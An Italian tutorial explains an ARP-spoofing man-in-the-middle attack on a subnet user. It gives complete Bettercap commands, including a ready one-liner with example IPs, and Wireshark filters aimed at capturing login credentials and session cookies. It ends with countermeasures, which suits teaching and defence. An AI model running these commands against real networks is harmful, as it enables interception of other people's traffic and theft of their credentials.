tags: Bettercap ARP_spoofing wireshark Intercettazione_traffico
Un attacco MitM permette a un attaccante di intercettare e potenzialmente manipolare le comunicazioni tra due parti. In questo scenario, ci concentreremo sull’intercettazione del traffico di un utente nella subnet che naviga su internet. Utilizzeremo Bettercap per eseguire l’attacco di ARP spoofing e Wireshark per analizzare il traffico intercettato.
Fasi dell’attacco:
-
Ricognizione della rete:
- Scopo: Identificare gli host presenti nella subnet, in particolare la vittima e il gateway (router).
- Comandi Bettercap:
net.probe on: Avvia il rilevamento degli host.net.recon on: Avvia la ricognizione della rete per ottenere informazioni dettagliate sugli host (opzionale, ma consigliato per identificare meglio la vittima).
- Output: Bettercap mostrerà gli indirizzi IP e MAC degli host rilevati. Prendi nota dell’IP della vittima e del gateway.
-
Impostazione del bersaglio dell’ARP spoofing:
- Scopo: Specificare a Bettercap quali host spoofare. In questo caso, vogliamo spoofare sia la vittima che il gateway, in modo da intercettare il traffico tra i due.
- Comando Bettercap:
set arp.spoof.targets <IP_vittima>,<IP_gateway>: Imposta i bersagli dell’ARP spoofing. Sostituisci<IP_vittima>con l’indirizzo IP della vittima e<IP_gateway>con l’indirizzo IP del gateway.- Esempio:
set arp.spoof.targets 192.168.1.10,192.168.1.1
-
Avvio dell’ARP spoofing e dello sniffing:
- Scopo: Avviare l’attacco di ARP spoofing per reindirizzare il traffico e avviare lo sniffing per catturare il traffico intercettato.
- Comandi Bettercap:
arp.spoof on: Avvia l’ARP spoofing.net.sniff on: Avvia lo sniffing del traffico.
-
Analisi del traffico con Wireshark:
- Scopo: Esaminare il traffico intercettato per individuare informazioni sensibili, come credenziali di accesso, cookie di sessione o altre informazioni.
- Azioni: Apri Wireshark sulla macchina attaccante e seleziona l’interfaccia di rete che stai utilizzando (la stessa specificata con
-ifaceall’avvio di Bettercap). Inizia la cattura del traffico. - Filtri Wireshark utili:
http: Per visualizzare il traffico HTTP non crittografato.http.request.method == "POST": Per filtrare le richieste HTTP POST (spesso utilizzate per l’invio di form di login).ip.addr == <IP_vittima>: Per filtrare il traffico che coinvolge l’IP della vittima.tcp.port == 80 || tcp.port == 443: Per filtrare il traffico sulle porte HTTP e HTTPS.ssl: Per visualizzare il traffico SSL/TLS (HTTPS). Attenzione: il traffico HTTPS è crittografato e non sarà direttamente leggibile a meno di non utilizzare tecniche di decrittazione (che esulano da questa guida base).
-
Interruzione dell’attacco:
- Scopo: Terminare l’ARP spoofing e lo sniffing.
- Comandi Bettercap:
arp.spoof off: Interrompe l’ARP spoofing.net.sniff off: Interrompe lo sniffing.exit: Chiude Bettercap.
Comando completo per avviare l’attacco (in un’unica riga):
Bash
bettercap -iface <interfaccia> -caplet "set arp.spoof.targets <IP_vittima>,<IP_gateway>; arp.spoof on; net.sniff on;"
Sostituisci <interfaccia>, <IP_vittima> e <IP_gateway> con i valori corretti.
Esempio pratico (con IP fittizi):
Supponiamo che:
- L’interfaccia di rete sia
eth0. - L’IP della vittima sia
192.168.1.10. - L’IP del gateway sia
192.168.1.1.
Il comando completo sarebbe:
Bash
bettercap -iface eth0 -caplet "set arp.spoof.targets 192.168.1.10,192.168.1.1; arp.spoof on; net.sniff on;"
Contromisure:
- Utilizzo di HTTPS: HTTPS crittografa il traffico, rendendo molto più difficile l’intercettazione di informazioni sensibili.
- Rilevamento di ARP spoofing: Utilizzare strumenti di monitoraggio della rete che rilevano anomalie nel traffico ARP.
- Static ARP entries: Configurare voci ARP statiche sui dispositivi per evitare che vengano “ingannati” da pacchetti ARP falsificati.
- Port security (su switch): Configurare il port security sugli switch per limitare il numero di indirizzi MAC che possono essere appresi su una singola porta, rendendo più difficile l’ARP spoofing.